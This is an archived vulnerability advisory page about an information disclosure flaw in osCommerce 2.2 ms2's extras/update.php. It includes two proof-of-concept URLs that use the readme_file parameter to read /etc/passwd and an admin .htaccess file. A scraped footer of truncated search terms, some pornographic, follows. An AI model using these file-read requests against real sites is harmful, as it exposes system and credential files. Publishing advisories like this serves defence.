about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , OSCommerce Update.PHP Information Disclosure Vulnerability


Title OSCommerce Update.PHP Information Disclosure Vulnerability
Published 2005-07-18-12:00AM
Updated 2005-07-18-09:54PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Andrew Hunter <andiroo@gmail.com> is credited with the discovery of this vulnerability.
Vulnerable  osCommerce osCommerce 2.2 ms2
Not Vulnerable  
Code   No exploit is required.

The following proof of concept URI are available:
http://www.example.com/catalog/extras/update.php?readme_file=/etc/passwd
http://www.example.com/catalog/extras/update.php?readme_file=../admin/.htaccess
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:43:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
downloadpr 200 /compo Common Vul iranian se www.trish www.sexboy linux kern 200 /compo horses pho yxwlkj.com iis/ ?1 compone news for c News Searc ex sex ara Www.teen joomla com N73theme crach sexusa pornhub.co Prno vidio search/exp haiku news news for C www.warlds Www.vedio xem phim s www.uu61.c 2...es/id. veido sex Walpepars Indih ms04-028 F TV.C yxwlkj.com CMS is Fre 22390 WWW.FREEPO Crack Data Invision P sendmail 8 php 4.3.10 sample sex ANIMAL SEX www.xplay. maxcpm.inf Php-Nuke e Ww.Sex.Co. news for c